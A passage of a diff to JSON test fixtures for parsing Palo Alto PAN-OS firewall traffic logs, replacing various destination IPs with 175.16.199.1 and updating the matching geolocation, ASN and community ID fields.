04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381811200Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4903,27 +4904,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4942,7 +4942,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4976,7 +4976,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=", + "community_id": "1:GY8jhTkAcplSQMn+CC7/azIV2gs=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -5014,14 +5014,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284052911Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381816600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5044,27 +5044,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -5083,7 +5082,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -5117,7 +5116,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=", + "community_id": "1:5JhT/ZcbuwDQS34hGqhKf01RQ34=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -5155,14 +5154,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284057489Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381822Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5185,24 +5184,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -5221,7 +5222,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -5255,7 +5256,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:SxifLhXvL8EiCuMvSbDcRARZyRw=", + "community_id": "1:nAnmGdMFfDqRmIrYyKMnd6BjTJs=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -5293,14 +5294,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284062105Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381827300Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5323,24 +5324,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -5359,7 +5362,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -5393,7 +5396,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:QYDqyZAUrBKpnIVn+epBn1ew/so=", + "community_id": "1:4WykhpqCfbAEFq4apGSBZIH0IVE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -5431,14 +5434,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284066698Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381832600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5461,24 +5464,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 111, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5494,7 +5499,7 @@ "packets": 1, "ip": "192.168.0.100" }, - "message": "192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -5528,7 +5533,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:shHCpyazCigToSNjn/e4N7P4biU=", + "community_id": "1:pMMIMicfrENbfeypsdzAPcSdfIs=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -5560,14 +5565,14 @@ "related": { "ip": [ "192.168.0.100", - "8.8.8.8", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284071298Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381837900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5590,24 +5595,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 906, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -5626,7 +5633,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -5660,7 +5667,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cDqhuLJdpDu0NsYQNFC3GAMS3GQ=", + "community_id": "1:02TjEb0OqywqXGjLpyI51uH+t/w=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -5698,14 +5705,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284075786Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381843300Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5728,27 +5735,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5013, - "ip": "50.19.102.116", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -5764,7 +5770,7 @@ "packets": 10, "ip": "192.168.0.100" }, - "message": "192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", + "message": "192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", "panw": { "panos": { "ruleset": "rule1", @@ -5798,7 +5804,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uf1iUYRFFiUYttG2AFf4pcXOdjw=", + "community_id": "1:Wa7URc5B1Rweuyc9rokTLSDwQzw=", "transport": "tcp", "application": "paloalto-wildfire-cloud", "type": "ipv4", @@ -5830,14 +5836,14 @@ "related": { "ip": [ "192.168.0.100", - "50.19.102.116", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284086434Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", + "ingested": "2021-12-09T13:43:22.381848600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5860,27 +5866,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 40026, "bytes": 99, - "ip": "65.55.223.19", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5899,7 +5904,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -5933,7 +5938,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:XF4dVSWPB46mtqr78f9EFUDEn6I=", + "community_id": "1:g7qob3exQkQiBYzG9yw7uxGwGQg=", "transport": "udp", "application": "skype-probe", "type": "ipv4", @@ -5971,14 +5976,14 @@ ], "ip": [ "192.168.0.2", - "65.55.223.19", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284091140Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381853900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6001,27 +6006,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 40029, "bytes": 902, - "ip": "65.55.223.24", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -6040,7 +6044,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -6074,7 +6078,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HEEGx0vjlpNA8Pw0s6pBr2v0rpo=", + "community_id": "1:jyuZs3bE9DC94tX+dmoKKQuCNTo=", "transport": "udp", "application": "skype-probe", "type": "ipv4", @@ -6112,14 +6116,14 @@ ], "ip": [ "192.168.0.2", - "65.55.223.24", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284095716Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381859300Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6142,24 +6146,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 141, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -6175,7 +6181,7 @@ "packets": 1, "ip": "192.168.0.100" }, - "message": "192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 